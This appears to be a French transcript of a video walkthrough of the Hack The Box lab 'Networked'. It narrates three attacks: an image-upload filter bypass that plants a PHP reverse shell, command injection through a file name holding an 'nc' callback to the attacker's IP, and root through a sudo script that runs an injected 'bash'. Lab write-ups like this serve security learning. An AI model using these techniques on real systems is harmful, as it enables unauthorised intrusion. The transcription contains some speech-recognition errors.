Bonjour à tous, aujourd'hui on va faire la machine network de Hack-the-Box qui était une machine facile. Alors comme d'habitude j'ai lancé un nmap pour voir les différents ports ouverts. Donc on trouve le port SSH numéro 22 et le port 80 qui est un serveur HTTP. Donc on va aller sur le serveur HTTP voir si on trouve quelque chose. Et là on tombe juste sur une page avec rien d'intéressant. Si on regarde le code source de la page, ici on a juste un commentaire nous indiquant que l'upload et la galerie ne sont pas encore linkés. Donc ça suppose qu'on va pouvoir trouver des fichiers qui sont pas encore qui sont cachés. Donc on va lancer un GoBuster sur la machine pour trouver du coup ces fichiers là. Worldlist Buster directory de medium, l'URL 10 10 10 146. Il a déjà à peine lancé, il nous trouve un dossier upload. Donc on va aller voir ce qu'on trouve. Donc on n'a rien si ce n'est ici un point. Le code source de la page c'est la même chose. Donc ça on va le noter. Il nous trouve un dossier backup. Alors ça c'est déjà intéressant, le nom. Et là, on trouve à l'intérieur de ce dossier un fichier backup.tar qu'on va télécharger. On le décompresse. Et on regarde ce qu'il y a dedans. Donc on a des fichiers PHP qui, au vu de index.php, c'est le code source du site qu'on est en train de voir. Et on a deux fichiers intéressants, un fichier upload et un fichier photo.php. On va s'y rendre voir vite fait ce que c'est. Upload.php. Donc ici on peut uploader un fichier. Et photo, c'est une galerie d'images qu'on imagine qui ont été justement uploadées via ce formulaire là. Donc on va pouvoir essayer de comprendre comment fonctionne l'upload et voir si on ne peut pas uploader un fichier malveillant. Alors ce qu'on voit déjà directement ici, c'est que on peut uploader uniquement des fichiers images, donc soit JPG, soit PNG, soit GIF. Et il y a toute une série de vérifications qui sont effectuées. Donc ici, on voit qu'il check le type du fichier. Et cette fonction-là, on la trouve dans le fichier lib.php. Donc, on va retourner ici. On va aller voir quelles sont les vérifications effectuées. Donc, il vérifie simplement si le MIME type commence par image slash. Ça, d'accord. Qu'est-ce qu'il teste d'autre là-dedans? Et dans cette fonction-là aussi, il teste file MIME type. Et ici, voilà, c'est là, on voit qui vérifie avec finfo-file. Donc réellement, il va vérifier dans le fichier si on a les magic bytes confirmant que c'est un fichier image. Après, il vérifie donc l'extension en fait du fichier ici. Donc ce qu'il fait, c'est donc il a une liste d'extensions autorisées. Et il prend le nom du fichier et il regarde si les dernières lettres correspondent bien à .jpg, .png, .gif ou .jpeg. Et sinon, si tout va bien, si on a passé toutes ces étapes-là, il upload le fichier. Donc à partir de là, on va pouvoir imaginer un petit scénario d'attaque. On va simplement créer un fichier test.php. .gif par exemple.
Comme ça, il sera interprété avec le point PHP par un fichier PHP. On rentre les magic bytes d'un fichier GIF, donc 89A. Et là, on peut directement écrire du code PHP. On enregistre ça. Et on va essayer d'uploader le fichier, voir si ça fonctionne. Le fichier a bien été uploadé, on a passé tous les contrôles. Si on va dans notre galerie, qu'on rafraîchit, on a bien notre photo ici. Alors, on va accéder directement à notre fichier qui se trouve donc, du coup dans le dossier upload, le nom de notre adresse IP et puis notre extension qu'on avait mis .php.gif, et on a bien notre code PHP qui s'est exécuté ici. Donc à partir de là, ça va être simple, il suffit qu'on mette un reverse shell, donc reverse shell PHP, on va utiliser Pentest Monkey, on télécharge le code, copier, on met ça, on met notre adresse IP 10 10 14 63, on va laisser le port 1 2 3 4, on enregistre, on lance ici un listener sur notre machine LVNP 1 2 3 4, on télécharge notre fichier, upload, on rafraîchit la galerie, on a toujours notre fichier là, et le fait qu'on ait en fait rafraîchi la page, ça a lancé le fichier en question, et donc on a bien le serveur qui s'est connecté à notre machine. Alors comme on peut le voir, on est sous l'ID, sous l'utilisateur Apache, donc on peut regarder ce qu'il y a dans le fichier passwd. Et là, on voit qu'on a plusieurs utilisateurs. On a Gully, Apache, bon, on en a plein d'autres. On va regarder dans le fichier home, dans le dossier home, si on a un dossier intéressant. Et on a bien un dossier Gully. On essaye d'accéder à ce dossier-là. Et là, on a bien le fichier user.txt qui est là. Malheureusement, on ne peut pas le lire puisque seul l'utilisateur Gully peut le lire. Donc, il va falloir qu'on trouve un moyen pour pouvoir passer à l'utilisateur Gully. Et ici, on remarque plusieurs fichiers qu'on a le droit de lire. Le fichier crontab Gully et checkattack.php. On va lire ces fichiers. Alors, on voit que crontab.gully, on est censé avoir un cron qui tourne sous l'utilisateur Gully, du coup, toutes les 3 minutes et qui lance checkattack.php. Donc, on va consulter le fichier checkattack.php. Et ici, là, le fichier permet de vérifier le nom des fichiers uploadés, et s'ils ne correspondent pas à un certain pattern, dans ces cas-là, il va exécuter une commande. Donc pour ça, il fait un scandir pour lister tous les fichiers dans le dossier upload. Il boucle sur le nom des fichiers trouvés, et si ça ne correspond pas à un pattern, dans ces cas-là, il va exécuter une commande pour supprimer le fichier en question. Et là, on va pouvoir faire une injection de commande. Pour ça, en fait, il suffit de créer un fichier qui a pour nom une commande bash à lancer. Donc on va aller directement dans le dossier var www html upload. Là, ici, on retrouve nos fichiers qu'on avait précédemment uploadés. Et là, on va simplement créer un fichier avec nc 10 10 14 63
9000, c'est basse. Et ça va nous suffire à lancer un Revershell. Donc on va ici lancer sur notre machine un node listener, du coup, nc lvnp 9000. Alors, pourquoi ça marche pas? On a bien créé ici, donc on a créé notre fichier et on a juste à attendre maximum 3 minutes et on devrait avoir une connexion. Mais on a déjà eu ici notre connexion. On est bien sous l'utilisateur Gulli. Donc on peut aller home Gulli wcc user.txt et on peut effectivement lire notre flag. Maintenant, on va passer à l'utilisateur root. Alors, on va simplement tester des choses de base. On va déjà essayer voir si on a des commandes qu'on peut exécuter avec sudo. Et on se rend compte que oui, on a en fait une commande qu'on peut exécuter sous l'utilisateur root. Et le fichier, c'est usr local sbin change name. On va aller voir ce fichier-là. Et dans ce fichier, on voit qu'il écrit en fait un fichier qui permet de décrire une interface réseau et à la fin il lance un if up dessus. C'est là où va se trouver la faille de sécurité, c'est que if up lit le fichier créé contenant des informations de l'interface réseau comme un script bash pour pouvoir exporter des variables. Et comme on le voit ici, on a l'espace qui est autorisé. Ce qui fait qu'on va pouvoir injecter une commande dans name pour pouvoir obtenir un shell sous root. Alors on va déjà lancer simplement l'exécutable. On va simplement lancer le programme, voir déjà ce qu'il nous propose. Il nous demande interface name. Donc en fait c'est ici, interface et toutes les variables qu'on a là. Test, le proxy méthode, test et boot proto. Et là, forcément ça ne fonctionne pas puisqu'il ne peut pas monter cette interface là puisqu'il n'y a aucun nom qui correspond. Par contre, ce qu'on va pouvoir faire, c'est simplement la même chose, test. Et ici, bash, test, test, test. Et là, on a eu notre bash qui a été exécuté et on est sous l'utilisateur root. On peut du coup aller directement dans root, lister les fichiers. On a bien notre fichier root.txt et on peut lire le fichier sans aucun souci. Voilà, donc c'était une machine simple, pas de difficulté technique particulière. Il fallait juste trouver cette petite astuce qui était simple à trouver en regardant sur internet. De suite, on trouve cette astuce-là. À très bientôt pour de nouvelles vidéos.